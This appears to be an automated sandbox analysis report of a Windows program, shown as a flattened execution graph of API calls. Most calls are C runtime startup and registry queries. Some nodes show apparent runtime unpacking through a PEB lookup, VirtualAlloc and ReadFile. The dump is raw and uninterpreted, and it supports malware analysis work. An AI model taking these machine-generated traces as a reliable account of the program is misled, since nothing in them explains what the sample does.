                    • Instruction Fuzzy Hash: 0BF0F631104054FFDB12DFA4CD00D9EBBA8EF06350B2640BAE841FB321D674DE11A798
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Execution Graph

                    Execution Coverage:16.6%
                    Dynamic/Decrypted Code Coverage:7.8%
                    Signature Coverage:4.6%
                    Total number of Nodes:1667
                    Total number of Limit Nodes:34
                    execution_graph 8885 286922 8886 28692e __mtinitlocknum 8885->8886 8887 286946 8886->8887 8888 286d64 _free 66 API calls 8886->8888 8890 286a30 __mtinitlocknum 8886->8890 8889 286954 8887->8889 8891 286d64 _free 66 API calls 8887->8891 8888->8887 8892 286d64 _free 66 API calls 8889->8892 8893 286962 8889->8893 8891->8889 8892->8893 8894 286d64 _free 66 API calls 8893->8894 8895 286970 8893->8895 8894->8895 8896 28697e 8895->8896 8897 286d64 _free 66 API calls 8895->8897 8898 28698c 8896->8898 8899 286d64 _free 66 API calls 8896->8899 8897->8896 8900 28699a 8898->8900 8901 286d64 _free 66 API calls 8898->8901 8899->8898 8902 2869ab 8900->8902 8903 286d64 _free 66 API calls 8900->8903 8901->8900 8904 286fb4 __lock 66 API calls 8902->8904 8903->8902 8905 2869b3 8904->8905 8906 2869d8 8905->8906 8907 2869bf InterlockedDecrement 8905->8907 8921 286a3c 8906->8921 8907->8906 8908 2869ca 8907->8908 8908->8906 8911 286d64 _free 66 API calls 8908->8911 8911->8906 8912 286fb4 __lock 66 API calls 8913 2869ec 8912->8913 8914 286a1d 8913->8914 8916 288db9 ___removelocaleref 8 API calls 8913->8916 8924 286a48 8914->8924 8919 286a01 8916->8919 8918 286d64 _free 66 API calls 8918->8890 8919->8914 8920 288e52 ___freetlocinfo 66 API calls 8919->8920 8920->8914 8927 286edb LeaveCriticalSection 8921->8927 8923 2869e5 8923->8912 8928 286edb LeaveCriticalSection 8924->8928 8926 286a2a 8926->8918 8927->8923 8928->8926 9378 285cfb 9379 285d37 9378->9379 9380 285d0d 9378->9380 9380->9379 9382 289db4 9380->9382 9383 289dc0 __mtinitlocknum 9382->9383 9384 286908 __getptd 66 API calls 9383->9384 9386 289dc5 9384->9386 9388 28ba54 9386->9388 9397 289e53 DecodePointer 9388->9397 9390 28ba59 9391 28ba64 9390->9391 9398 289e60 9390->9398 9393 28ba7c 9391->9393 9394 283b2b __call_reportfault 8 API calls 9391->9394 9395 285fe4 __amsg_exit 66 API calls 9393->9395 9394->9393 9396 28ba86 9395->9396 9397->9390 9401 289e6c __mtinitlocknum 9398->9401 9399 289ec7 9400 289ea9 DecodePointer 9399->9400 9405 289ed6 9399->9405 9406 289e98 _siglookup 9400->9406 9401->9399 9401->9400 9402 289e93 9401->9402 9408 289e8f 9401->9408 9404 28688f __getptd_noexit 66 API calls 9402->9404 9404->9406 9407 283cf8 __write_nolock 66 API calls 9405->9407 9409 289f33 9406->9409 9411 285fe4 __amsg_exit 66 API calls 9406->9411 9418 289ea1 __mtinitlocknum 9406->9418 9410 289edb 9407->9410 9408->9402 9408->9405 9413 286fb4 __lock 66 API calls 9409->9413 9415 289f3e 9409->9415 9412 283ca6 __write_nolock 11 API calls 9410->9412 9411->9409 9412->9418 9413->9415 9416 289f73 9415->9416 9419 286758 RtlEncodePointer 9415->9419 9420 289fc7 9416->9420 9418->9391 9419->9416 9421 289fcd 9420->9421 9422 289fd4 9420->9422 9424 286edb LeaveCriticalSection 9421->9424 9422->9418 9424->9422 8970 283632 8977 285cf2 8970->8977 8973 283645 8975 286d64 _free 66 API calls 8973->8975 8976 283650 8975->8976 8990 285c18 8977->8990 8979 283637 8979->8973 8980 286d9e 8979->8980 8981 286daa __mtinitlocknum 8980->8981 8982 286fb4 __lock 66 API calls 8981->8982 8983 286db6 8982->8983 8984 286e1c 8983->8984 8988 286df1 DeleteCriticalSection 8983->8988 9007 28a72d 8983->9007 9020 286e31 8984->9020 8986 286e28 __mtinitlocknum 8986->8973 8989 286d64 _free 66 API calls 8988->8989 8989->8983 8991 285c24 __mtinitlocknum 8990->8991 8992 286fb4 __lock 66 API calls 8991->8992 8997 285c33 8992->8997 8993 285ccb 9003 285ce9 8993->9003 8995 283693 __getstream 67 API calls 8995->8997 8996 285cd7 __mtinitlocknum 8996->8979 8997->8993 8997->8995 8999 285bd0 99 API calls __fflush_nolock 8997->8999 9000 285cba 8997->9000 8999->8997 9001 283701 __getstream 2 API calls 9000->9001 9002 285cc8 9001->9002 9002->8997 9006 286edb LeaveCriticalSection 9003->9006 9005 285cf0 9005->8996 9006->9005 9008 28a739 __mtinitlocknum 9007->9008 9009 28a74b 9008->9009 9010 28a760 9008->9010 9011 283cf8 __write_nolock 66 API calls 9009->9011 9012 283652 __lock_file 67 API calls 9010->9012 9014 28a75b __mtinitlocknum 9010->9014 9013 28a750 9011->9013 9015 28a779 9012->9015 9016 283ca6 __write_nolock 11 API calls 9013->9016 9014->8983 9023 28a6c0 9015->9023 9016->9014 9073 286edb LeaveCriticalSection 9020->9073 9022 286e38 9022->8986 9024 28a6d1 9023->9024 9025 28a6e5 9023->9025 9026 283cf8 __write_nolock 66 API calls 9024->9026 9027 28a6e1 9025->9027 9029 285b68 __flush 95 API calls 9025->9029 9028 28a6d6 9026->9028 9039 28a799 9027->9039 9030 283ca6 __write_nolock 11 API calls 9028->9030 9031 28a6f1 9029->9031 9030->9027 9042 28baba 9031->9042 9034 2856b8 __flush 66 API calls 9035 28a6ff 9034->9035 9046 28a9f3 9035->9046 9037 28a705 9037->9027 9038 286d64 _free 66 API calls 9037->9038 9038->9027 9040 2836c5 _fseek 2 API calls 9039->9040 9041 28a79f 9040->9041 9041->9014 9043 28a6f9 9042->9043 9044 28baca 9042->9044 9043->9034 9044->9043 9045 286d64 _free 66 API calls 9044->9045 9045->9043 9047 28a9ff __mtinitlocknum 9046->9047 9048 28aa22 9047->9048 9049 28aa07 9047->9049 9051 28aa2e 9048->9051 9054 28aa68 9048->9054 9050 283d0b __write_nolock 66 API calls 9049->9050 9052 28aa0c 9050->9052 9053 283d0b __write_nolock 66 API calls 9051->9053 9055 283cf8 __write_nolock 66 API calls 9052->9055 9056 28aa33 9053->9056 9057 289645 ___lock_fhandle 68 API calls 9054->9057 9066 28aa14 __mtinitlocknum 9055->9066 9058 283cf8 __write_nolock 66 API calls 9056->9058 9060 28aa6e 9057->9060 9059 28aa3b 9058->9059 9061 283ca6 __write_nolock 11 API calls 9059->9061 9062 28aa88 9060->9062 9063 28aa7c 9060->9063 9061->9066 9065 283cf8 __write_nolock 66 API calls 9062->9065 9064 28a957 __close_nolock 69 API calls 9063->9064 9067 28aa82 9064->9067 9065->9067 9066->9037 9069 28aaaf 9067->9069 9072 2896e4 LeaveCriticalSection 9069->9072 9071 28aab5 9071->9066 9072->9071 9073->9022 9203 288d0d 9206 288b72 9203->9206 9205 288d1c 9207 288b7e __mtinitlocknum 9206->9207 9208 286908 __getptd 66 API calls 9207->9208 9209 288b87 9208->9209 9210 288869 _LocaleUpdate::_LocaleUpdate 68 API calls 9209->9210 9211 288b91 9210->9211 9237 28890d 9211->9237 9214 286c85 __malloc_crt 66 API calls 9215 288bb2 9214->9215 9216 288cd1 __mtinitlocknum 9215->9216 9244 288989 9215->9244 9216->9205 9219 288cde 9219->9216 9225 286d64 _free 66 API calls 9219->9225 9229 288cf1 9219->9229 9220 288be2 InterlockedDecrement 9221 288bf2 9220->9221 9222 288c03 InterlockedIncrement 9220->9222 9221->9222 9223 286d64 _free 66 API calls 9221->9223 9222->9216 9224 288c19 9222->9224 9227 288c02 9223->9227 9224->9216 9228 286fb4 __lock 66 API calls 9224->9228 9225->9229 9226 283cf8 __write_nolock 66 API calls 9226->9216 9227->9222 9231 288c2d InterlockedDecrement 9228->9231 9229->9226 9232 288ca9 9231->9232 9233 288cbc InterlockedIncrement 9231->9233 9232->9233 9235 286d64 _free 66 API calls 9232->9235 9254 288cd3 9233->9254 9236 288cbb 9235->9236 9236->9233 9238 2841f6 _LocaleUpdate::_LocaleUpdate 76 API calls 9237->9238 9239 288921 9238->9239 9240 28894a 9239->9240 9241 28892c GetOEMCP 9239->9241 9242 28894f GetACP 9240->9242 9243 28893c 9240->9243 9241->9243 9242->9243 9243->9214 9243->9216 9245 28890d getSystemCP 78 API calls 9244->9245 9246 2889a9 9245->9246 9247 2889b4 setSBCS 9246->9247 9250 2889f8 IsValidCodePage 9246->9250 9253 288a1d _memset __setmbcp_nolock 9246->9253 9248 2879c4 __write_nolock 5 API calls 9247->9248 9249 288b70 9248->9249 9249->9219 9249->9220 9250->9247 9251 288a0a GetCPInfo 9250->9251 9251->9247 9251->9253 9257 2886d9 GetCPInfo 9253->9257 9318 286edb LeaveCriticalSection 9254->9318 9256 288cda 9256->9216 9258 28870d _memset 9257->9258 9266 2887c1 9257->9266 9267 28b0ef 9258->9267 9262 2879c4 __write_nolock 5 API calls 9264 288867 9262->9264 9264->9253 9265 28afc2 ___crtLCMapStringA 82 API calls 9265->9266 9266->9262 9268 2841f6 _LocaleUpdate::_LocaleUpdate 76 API calls 9267->9268 9269 28b102 9268->9269 9277 28b008 9269->9277 9272 28afc2 9273 2841f6 _LocaleUpdate::_LocaleUpdate 76 API calls 9272->9273 9274 28afd5 9273->9274 9294 28addb 9274->9294 9278 28b031 MultiByteToWideChar 9277->9278 9279 28b026 9277->9279 9281 28b05e 9278->9281 9289 28b05a 9278->9289 9279->9278 9280 2879c4 __write_nolock 5 API calls 9282 28877c 9280->9282 9283 28a4fd _malloc 66 API calls 9281->9283 9287 28b073 _memset __crtLCMapStringA_stat 9281->9287 9282->9272 9283->9287 9284 28b0ac MultiByteToWideChar 9285 28b0c2 GetStringTypeW 9284->9285 9286 28b0d3 9284->9286 9285->9286 9290 28adbb 9286->9290 9287->9284 9287->9289 9289->9280 9291 28add8 9290->9291 9292 28adc7 9290->9292 9291->9289 9292->9291 9293 286d64 _free 66 API calls 9292->9293 9293->9291 9296 28adf9 MultiByteToWideChar 9294->9296 9297 28ae57 9296->9297 9301 28ae5e 9296->9301 9298 2879c4 __write_nolock 5 API calls 9297->9298 9300 28879c 9298->9300 9299 28aeab MultiByteToWideChar 9303 28afa3 9299->9303 9304 28aec4 LCMapStringW 9299->9304 9300->9265 9302 28a4fd _malloc 66 API calls 9301->9302 9307 28ae77 __crtLCMapStringA_stat 9301->9307 9302->9307 9305 28adbb __freea 66 API calls 9303->9305 9304->9303 9306 28aee3 9304->9306 9305->9297 9308 28aeed 9306->9308 9310 28af16 9306->9310 9307->9297 9307->9299 9308->9303 9309 28af01 LCMapStringW 9308->9309 9309->9303 9312 28af31 __crtLCMapStringA_stat 9310->9312 9313 28a4fd _malloc 66 API calls 9310->9313 9311 28af65 LCMapStringW 9314 28af7b WideCharToMultiByte 9311->9314 9315 28af9d 9311->9315 9312->9303 9312->9311 9313->9312 9314->9315 9316 28adbb __freea 66 API calls 9315->9316 9316->9303 9318->9256 7216 283404 7254 283d50 7216->7254 7218 283410 GetStartupInfoW 7219 283424 HeapSetInformation 7218->7219 7222 28342f 7218->7222 7219->7222 7221 28347d 7223 283488 7221->7223 7362 2833db 7221->7362 7255 286bcc HeapCreate 7222->7255 7256 286a51 GetModuleHandleW 7223->7256 7226 28348e 7227 283499 __RTC_Initialize 7226->7227 7228 2833db _fast_error_exit 66 API calls 7226->7228 7281 2857da GetStartupInfoW 7227->7281 7228->7227 7231 2834b3 GetCommandLineW 7294 2866b4 GetEnvironmentStringsW 7231->7294 7235 2834c3 7300 286606 GetModuleFileNameW 7235->7300 7237 2834cd 7238 2834d8 7237->7238 7239 286018 __amsg_exit 66 API calls 7237->7239 7304 2863d4 7238->7304 7239->7238 7241 2834de 7242 286018 __amsg_exit 66 API calls 7241->7242 7244 2834e9 7241->7244 7242->7244 7318 285df7 7244->7318 7245 2834f1 7246 286018 __amsg_exit 66 API calls 7245->7246 7247 2834fc __wwincmdln 7245->7247 7246->7247 7324 2828a0 6 API calls 7247->7324 7249 28351e 7250 28352c 7249->7250 7377 285fce 7249->7377 7380 285ffa 7250->7380 7253 283531 __mtinitlocknum 7254->7218 7255->7221 7257 286a6e GetProcAddress GetProcAddress GetProcAddress GetProcAddress 7256->7257 7258 286a65 7256->7258 7259 286ab8 TlsAlloc 7257->7259 7383 28679e 7258->7383 7263 286b06 TlsSetValue 7259->7263 7264 286bc7 7259->7264 7263->7264 7265 286b17 7263->7265 7264->7226 7393 285da0 7265->7393 7270 286b5f DecodePointer 7273 286b74 7270->7273 7271 286bc2 7272 28679e __mtterm 70 API calls 7271->7272 7272->7264 7273->7271 7402 286cca 7273->7402 7276 286b92 DecodePointer 7277 286ba3 7276->7277 7277->7271 7278 286ba7 7277->7278 7408 2867db 7278->7408 7280 286baf GetCurrentThreadId 7280->7264 7282 286cca __calloc_crt 66 API calls 7281->7282 7293 2857f8 7282->7293 7283 28596d 7284 2859a3 GetStdHandle 7283->7284 7287 285a07 SetHandleCount 7283->7287 7288 2859b5 GetFileType 7283->7288 7291 2859db InitializeCriticalSectionAndSpinCount 7283->7291 7284->7283 7285 2858ed 7285->7283 7289 285919 GetFileType 7285->7289 7290 285924 InitializeCriticalSectionAndSpinCount 7285->7290 7286 286cca __calloc_crt 66 API calls 7286->7293 7292 2834a7 7287->7292 7288->7283 7289->7285 7289->7290 7290->7285 7290->7292 7291->7283 7291->7292 7292->7231 7370 286018 7292->7370 7293->7283 7293->7285 7293->7286 7293->7292 7293->7293 7295 2866c5 7294->7295 7296 2866c9 7294->7296 7295->7235 7297 286c85 __malloc_crt 66 API calls 7296->7297 7298 2866eb _memmove 7297->7298 7299 2866f2 FreeEnvironmentStringsW 7298->7299 7299->7235 7301 28663b _wparse_cmdline 7300->7301 7302 286c85 __malloc_crt 66 API calls 7301->7302 7303 28667e _wparse_cmdline 7301->7303 7302->7303 7303->7237 7305 2863ec _wcslen 7304->7305 7309 2863e4 7304->7309 7306 286cca __calloc_crt 66 API calls 7305->7306 7311 286410 _wcslen 7306->7311 7307 286466 7308 286d64 _free 66 API calls 7307->7308 7308->7309 7309->7241 7310 286cca __calloc_crt 66 API calls 7310->7311 7311->7307 7311->7309 7311->7310 7312 28648c 7311->7312 7313 28a45b __wsetenvp 66 API calls 7311->7313 7315 2864a3 7311->7315 7314 286d64 _free 66 API calls 7312->7314 7313->7311 7314->7309 7316 283c54 __invoke_watson 10 API calls 7315->7316 7317 2864af 7316->7317 7317->7241 7319 285e05 __IsNonwritableInCurrentImage 7318->7319 7652 2891ec 7319->7652 7321 285e23 __initterm_e 7323 285e44 __IsNonwritableInCurrentImage 7321->7323 7655 28a17b 7321->7655 7323->7245 7325 2828ef Sleep 7324->7325 7326 2828fc 7325->7326 7327 28297a RegisterWindowMessageW 7326->7327 7720 282d3e 7326->7720 7328 28299c _memset 7327->7328 7770 281640 GetSystemMetrics GetSystemMetrics 7328->7770 7333 28291f 7736 283270 7333->7736 7334 2829ac _memset 7336 2829ba 6 API calls 7334->7336 7338 282a60 MonitorFromRect GetMonitorInfoW 7336->7338 7339 282a55 7336->7339 7337 282925 7340 28335f _fseek 99 API calls 7337->7340 7341 282aa0 CreateWindowExW 7338->7341 7339->7249 7342 282931 VirtualAlloc 7340->7342 7346 282b00 7341->7346 7347 282af2 ExitProcess 7341->7347 7749 2830bf 7342->7749 7832 281e60 13 API calls 7346->7832 7350 282b05 ShowWindow UpdateWindow DragAcceptFiles GetCommandLineW 7833 282690 7350->7833 7353 282b42 LoadAcceleratorsW GetMessageW 7354 282b6a 7353->7354 7355 282bbf 7353->7355 7356 282b70 IsDialogMessageW 7354->7356 7355->7249 7357 282bae GetMessageW 7356->7357 7358 282b85 TranslateAcceleratorW 7356->7358 7357->7355 7357->7356 7358->7357 7359 282b98 TranslateMessage DispatchMessageW 7358->7359 7359->7357 7363 2833e9 7362->7363 7364 2833ee 7362->7364 7366 28620b __FF_MSGBANNER 66 API calls 7363->7366 7365 28605c __NMSG_WRITE 66 API calls 7364->7365 7367 2833f6 7365->7367 7366->7364 7368 285d76 __mtinitlocknum 3 API calls 7367->7368 7369 283400 7368->7369 7369->7223 7371 28620b __FF_MSGBANNER 66 API calls 7370->7371 7372 286022 7371->7372 7373 28605c __NMSG_WRITE 66 API calls 7372->7373 7374 28602a 7373->7374 8834 285fe4 7374->8834 7378 285e8e _doexit 66 API calls 7377->7378 7379 285fdf 7378->7379 7379->7250 7381 285e8e _doexit 66 API calls 7380->7381 7382 286005 7381->7382 7382->7253 7384 2867a8 DecodePointer 7383->7384 7385 2867b7 7383->7385 7384->7385 7386 2867c8 TlsFree 7385->7386 7387 2867d6 7385->7387 7386->7387 7388 286ea0 DeleteCriticalSection 7387->7388 7389 286eb8 7387->7389 7421 286d64 7388->7421 7391 286eca DeleteCriticalSection 7389->7391 7392 286a6a 7389->7392 7391->7389 7392->7226 7447 286758 RtlEncodePointer 7393->7447 7395 285da8 __init_pointers __initp_misc_winsig 7448 289ded EncodePointer 7395->7448 7397 285dce EncodePointer EncodePointer EncodePointer EncodePointer 7398 286e3a 7397->7398 7399 286e45 7398->7399 7400 286e4f InitializeCriticalSectionAndSpinCount 7399->7400 7401 286b5b 7399->7401 7400->7399 7400->7401 7401->7270 7401->7271 7404 286cd3 7402->7404 7405 286b8a 7404->7405 7406 286cf1 Sleep 7404->7406 7449 28a591 7404->7449 7405->7271 7405->7276 7407 286d06 7406->7407 7407->7404 7407->7405 7460 283d50 7408->7460 7410 2867e7 GetModuleHandleW 7461 286fb4 7410->7461 7412 286825 InterlockedIncrement 7468 28687d 7412->7468 7415 286fb4 __lock 64 API calls 7416 286846 7415->7416 7471 288d2a InterlockedIncrement 7416->7471 7418 286864 7483 286886 7418->7483 7420 286871 __mtinitlocknum 7420->7280 7422 286d6f HeapFree 7421->7422 7426 286d98 __dosmaperr 7421->7426 7423 286d84 7422->7423 7422->7426 7427 283cf8 7423->7427 7426->7387 7430 28688f GetLastError 7427->7430 7429 283cfd GetLastError 7429->7426 7444 28676a TlsGetValue 7430->7444 7433 2868fc SetLastError 7433->7429 7434 286cca __calloc_crt 62 API calls 7435 2868ba 7434->7435 7435->7433 7436 2868c2 DecodePointer 7435->7436 7437 2868d7 7436->7437 7438 2868db 7437->7438 7439 2868f3 7437->7439 7440 2867db __getptd_noexit 62 API calls 7438->7440 7441 286d64 _free 62 API calls 7439->7441 7442 2868e3 GetCurrentThreadId 7440->7442 7443 2868f9 7441->7443 7442->7433 7443->7433 7445 28679a 7444->7445 7446 28677f DecodePointer TlsSetValue 7444->7446 7445->7433 7445->7434 7446->7445 7447->7395 7448->7397 7450 28a59d 7449->7450 7457 28a5b8 7449->7457 7451 28a5a9 7450->7451 7450->7457 7453 283cf8 __write_nolock 65 API calls 7451->7453 7452 28a5cb RtlAllocateHeap 7456 28a5f2 7452->7456 7452->7457 7454 28a5ae 7453->7454 7454->7404 7456->7404 7457->7452 7457->7456 7458 28a030 DecodePointer 7457->7458 7459 28a045 7458->7459 7459->7457 7460->7410 7462 286fc9 7461->7462 7463 286fdc EnterCriticalSection 7461->7463 7486 286ef2 7462->7486 7463->7412 7465 286fcf 7465->7463 7466 286018 __amsg_exit 65 API calls 7465->7466 7467 286fdb 7466->7467 7467->7463 7650 286edb LeaveCriticalSection 7468->7650 7470 28683f 7470->7415 7472 288d48 InterlockedIncrement 7471->7472 7473 288d4b 7471->7473 7472->7473 7474 288d58 7473->7474 7475 288d55 InterlockedIncrement 7473->7475 7476 288d62 InterlockedIncrement 7474->7476 7477 288d65 7474->7477 7475->7474 7476->7477 7478 288d6f InterlockedIncrement 7477->7478 7480 288d72 7477->7480 7478->7480 7479 288d8b InterlockedIncrement 7479->7480 7480->7479 7481 288d9b InterlockedIncrement 7480->7481 7482 288da6 InterlockedIncrement 7480->7482 7481->7480 7482->7418 7651 286edb LeaveCriticalSection 7483->7651 7485 28688d 7485->7420 7487 286efe __mtinitlocknum 7486->7487 7488 286f0e 7487->7488 7489 286f26 7487->7489 7513 28620b 7488->7513 7495 286f34 __mtinitlocknum 7489->7495 7549 286c85 7489->7549 7495->7465 7497 286f55 7500 286fb4 __lock 65 API calls 7497->7500 7498 286f46 7499 283cf8 __write_nolock 65 API calls 7498->7499 7499->7495 7502 286f5c 7500->7502 7504 286f8f 7502->7504 7505 286f64 InitializeCriticalSectionAndSpinCount 7502->7505 7507 286d64 _free 65 API calls 7504->7507 7506 286f74 7505->7506 7509 286f80 7505->7509 7508 286d64 _free 65 API calls 7506->7508 7507->7509 7511 286f7a 7508->7511 7555 286fab 7509->7555 7512 283cf8 __write_nolock 65 API calls 7511->7512 7512->7509 7558 28a4be 7513->7558 7515 286212 7516 28621f 7515->7516 7518 28a4be __FF_MSGBANNER 66 API calls 7515->7518 7517 28605c __NMSG_WRITE 66 API calls 7516->7517 7521 286241 7516->7521 7519 286237 7517->7519 7518->7516 7520 28605c __NMSG_WRITE 66 API calls 7519->7520 7520->7521 7522 28605c 7521->7522 7523 28607d __NMSG_WRITE 7522->7523 7524 286199 7523->7524 7525 28a4be __FF_MSGBANNER 63 API calls 7523->7525 7619 2879c4 7524->7619 7527 286097 7525->7527 7529 2861a8 GetStdHandle 7527->7529 7530 28a4be __FF_MSGBANNER 63 API calls 7527->7530 7528 286209 7546 285d76 7528->7546 7529->7524 7533 2861b6 _strlen 7529->7533 7531 2860a8 7530->7531 7531->7529 7532 2860ba 7531->7532 7532->7524 7583 28a45b 7532->7583 7533->7524 7536 2861ec WriteFile 7533->7536 7536->7524 7537 2860e6 GetModuleFileNameW 7538 286107 7537->7538 7541 286113 _wcslen 7537->7541 7540 28a45b __wsetenvp 63 API calls 7538->7540 7539 283c54 __invoke_watson 10 API calls 7539->7541 7540->7541 7541->7539 7543 28a2fe 63 API calls __NMSG_WRITE 7541->7543 7544 286189 7541->7544 7592 28a373 7541->7592 7543->7541 7601 28a192 7544->7601 7629 285d4b GetModuleHandleW 7546->7629 7551 286c8e 7549->7551 7552 286cc4 7551->7552 7553 286ca5 Sleep 7551->7553 7632 28a4fd 7551->7632 7552->7497 7552->7498 7554 286cba 7553->7554 7554->7551 7554->7552 7649 286edb LeaveCriticalSection 7555->7649 7557 286fb2 7557->7495 7559 28a4ca 7558->7559 7560 28a4d4 7559->7560 7561 283cf8 __write_nolock 66 API calls 7559->7561 7560->7515 7562 28a4ed 7561->7562 7565 283ca6 7562->7565 7568 283c79 DecodePointer 7565->7568 7569 283c8e 7568->7569 7574 283c54 7569->7574 7571 283ca5 7572 283c79 __write_nolock 10 API calls 7571->7572 7573 283cb2 7572->7573 7573->7515 7577 283b2b 7574->7577 7578 283b4a _memset __call_reportfault 7577->7578 7579 283b68 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7578->7579 7581 283c36 __call_reportfault 7579->7581 7580 2879c4 __write_nolock 5 API calls 7582 283c52 GetCurrentProcess TerminateProcess 7580->7582 7581->7580 7582->7571 7584 28a469 7583->7584 7585 28a470 7583->7585 7584->7585 7588 28a491 7584->7588 7586 283cf8 __write_nolock 66 API calls 7585->7586 7591 28a475 7586->7591 7587 283ca6 __write_nolock 11 API calls 7589 2860db 7587->7589 7588->7589 7590 283cf8 __write_nolock 66 API calls 7588->7590 7589->7537 7589->7541 7590->7591 7591->7587 7596 28a385 7592->7596 7593 28a389 7594 28a38e 7593->7594 7595 283cf8 __write_nolock 66 API calls 7593->7595 7594->7541 7597 28a3a5 7595->7597 7596->7593 7596->7594 7599 28a3cc 7596->7599 7598 283ca6 __write_nolock 11 API calls 7597->7598 7598->7594 7599->7594 7600 283cf8 __write_nolock 66 API calls 7599->7600 7600->7597 7627 286758 RtlEncodePointer 7601->7627 7603 28a1b8 7604 28a1c8 LoadLibraryW 7603->7604 7605 28a245 7603->7605 7606 28a2dd 7604->7606 7607 28a1dd GetProcAddress 7604->7607 7611 28a25f DecodePointer DecodePointer 7605->7611 7615 28a272 7605->7615 7612 2879c4 __write_nolock 5 API calls 7606->7612 7607->7606 7610 28a1f3 7 API calls 7607->7610 7608 28a2a8 DecodePointer 7609 28a2d1 DecodePointer 7608->7609 7613 28a2af 7608->7613 7609->7606 7610->7605 7614 28a235 GetProcAddress EncodePointer 7610->7614 7611->7615 7616 28a2fc 7612->7616 7613->7609 7617 28a2c2 DecodePointer 7613->7617 7614->7605 7615->7608 7615->7609 7618 28a295 7615->7618 7616->7524 7617->7609 7617->7618 7618->7609 7620 2879cc 7619->7620 7621 2879ce IsDebuggerPresent 7619->7621 7620->7528 7628 2879bc 7621->7628 7624 28ad0c SetUnhandledExceptionFilter UnhandledExceptionFilter 7625 28ad31 GetCurrentProcess TerminateProcess 7624->7625 7626 28ad29 __call_reportfault 7624->7626 7625->7528 7626->7625 7627->7603 7628->7624 7630 285d5f GetProcAddress 7629->7630 7631 285d6f ExitProcess 7629->7631 7630->7631 7633 28a57a 7632->7633 7641 28a50b 7632->7641 7634 28a030 _malloc DecodePointer 7633->7634 7635 28a580 7634->7635 7637 283cf8 __write_nolock 65 API calls 7635->7637 7636 28620b __FF_MSGBANNER 65 API calls 7640 28a516 7636->7640 7648 28a572 7637->7648 7638 28a539 RtlAllocateHeap 7638->7641 7638->7648 7639 28605c __NMSG_WRITE 65 API calls 7639->7640 7640->7636 7640->7639 7640->7641 7644 285d76 __mtinitlocknum 3 API calls 7640->7644 7641->7638 7641->7640 7642 28a566 7641->7642 7645 28a030 _malloc DecodePointer 7641->7645 7646 28a564 7641->7646 7643 283cf8 __write_nolock 65 API calls 7642->7643 7643->7646 7644->7640 7645->7641 7647 283cf8 __write_nolock 65 API calls 7646->7647 7647->7648 7648->7551 7649->7557 7650->7470 7651->7485 7653 2891f2 EncodePointer 7652->7653 7653->7653 7654 28920c 7653->7654 7654->7321 7658 28a13f 7655->7658 7657 28a188 7657->7323 7659 28a14b __mtinitlocknum 7658->7659 7666 285d8e 7659->7666 7665 28a16c __mtinitlocknum 7665->7657 7667 286fb4 __lock 66 API calls 7666->7667 7668 285d95 7667->7668 7669 28a058 DecodePointer DecodePointer 7668->7669 7670 28a107 7669->7670 7671 28a086 7669->7671 7680 28a175 7670->7680 7671->7670 7683 28ba87 7671->7683 7673 28a0ea EncodePointer EncodePointer 7673->7670 7674 28a0bc 7674->7670 7677 286d16 __realloc_crt 70 API calls 7674->7677 7678 28a0d8 EncodePointer 7674->7678 7675 28a098 7675->7673 7675->7674 7690 286d16 7675->7690 7679 28a0d2 7677->7679 7678->7673 7679->7670 7679->7678 7716 285d97 7680->7716 7684 28ba92 7683->7684 7685 28baa7 HeapSize 7683->7685 7686 283cf8 __write_nolock 66 API calls 7684->7686 7685->7675 7687 28ba97 7686->7687 7688 283ca6 __write_nolock 11 API calls 7687->7688 7689 28baa2 7688->7689 7689->7675 7692 286d1f 7690->7692 7693 286d5e 7692->7693 7694 286d3f Sleep 7692->7694 7695 28a613 7692->7695 7693->7674 7694->7692 7696 28a629 7695->7696 7697 28a61e 7695->7697 7699 28a631 7696->7699 7707 28a63e 7696->7707 7698 28a4fd _malloc 66 API calls 7697->7698 7700 28a626 7698->7700 7701 286d64 _free 66 API calls 7699->7701 7700->7692 7715 28a639 __dosmaperr 7701->7715 7702 28a676 7703 28a030 _malloc DecodePointer 7702->7703 7705 28a67c 7703->7705 7704 28a646 HeapReAlloc 7704->7707 7704->7715 7708 283cf8 __write_nolock 66 API calls 7705->7708 7706 28a6a6 7710 283cf8 __write_nolock 66 API calls 7706->7710 7707->7702 7707->7704 7707->7706 7709 28a030 _malloc DecodePointer 7707->7709 7712 28a68e 7707->7712 7708->7715 7709->7707 7711 28a6ab GetLastError 7710->7711 7711->7715 7713 283cf8 __write_nolock 66 API calls 7712->7713 7714 28a693 GetLastError 7713->7714 7714->7715 7715->7692 7719 286edb LeaveCriticalSection 7716->7719 7718 285d9e 7718->7665 7719->7718 7849 282c80 7720->7849 7722 282913 7723 28335f 7722->7723 7727 28336b __mtinitlocknum 7723->7727 7724 283377 7725 283cf8 __write_nolock 66 API calls 7724->7725 7728 28337c 7725->7728 7726 28339d 8499 283652 7726->8499 7727->7724 7727->7726 7730 283ca6 __write_nolock 11 API calls 7728->7730 7734 283387 __mtinitlocknum 7730->7734 7734->7333 7737 28327c __mtinitlocknum 7736->7737 7738 283288 7737->7738 7739 28329d 7737->7739 7740 283cf8 __write_nolock 66 API calls 7738->7740 7741 283652 __lock_file 67 API calls 7739->7741 7743 28328d 7740->7743 7742 2832a5 7741->7742 7744 2830dc __ftell_nolock 71 API calls 7742->7744 7745 283ca6 __write_nolock 11 API calls 7743->7745 7746 2832b2 7744->7746 7748 283298 __mtinitlocknum 7745->7748 8579 2832cb 7746->8579 7748->7337 8582 283031 7749->8582 7751 28294c 7752 5f122c 7751->7752 7757 5f0f9c 7751->7757 7753 5f1233 7752->7753 7754 5f123f 7753->7754 7756 5f16e6 ExitProcess 7753->7756 8678 5f08ef 7753->8678 7754->7327 8766 5f005f GetPEB 7757->8766 7759 5f10e9 8767 5f0f1d 7759->8767 7761 5f10f1 7762 5f1196 7761->7762 8780 5f0422 7761->8780 7762->7327 7765 5f11f0 VirtualAlloc ReadFile 7765->7762 7768 5f1226 7765->7768 7766 5f123f 7766->7327 7767 5f08ef 15 API calls 7767->7768 7768->7766 7768->7767 7769 5f16e6 ExitProcess 7768->7769 7771 281661 GetSystemMetrics 7770->7771 8826 28c060 7771->8826 7775 281763 RegQueryValueExW 7777 28179b RegQueryValueExW 7775->7777 7778 28178d 7775->7778 7776 281c35 7776->7334 7779 2817ba 7777->7779 7780 2817c7 RegQueryValueExW 7777->7780 7778->7777 7779->7780 7781 2817f4 RegQueryValueExW 7780->7781 7782 2817e6 7780->7782 7783 28181e RegQueryValueExW 7781->7783 7784 281813 7781->7784 7782->7781 7785 281848 RegQueryValueExW 7783->7785 7786 28183d 7783->7786 7784->7783 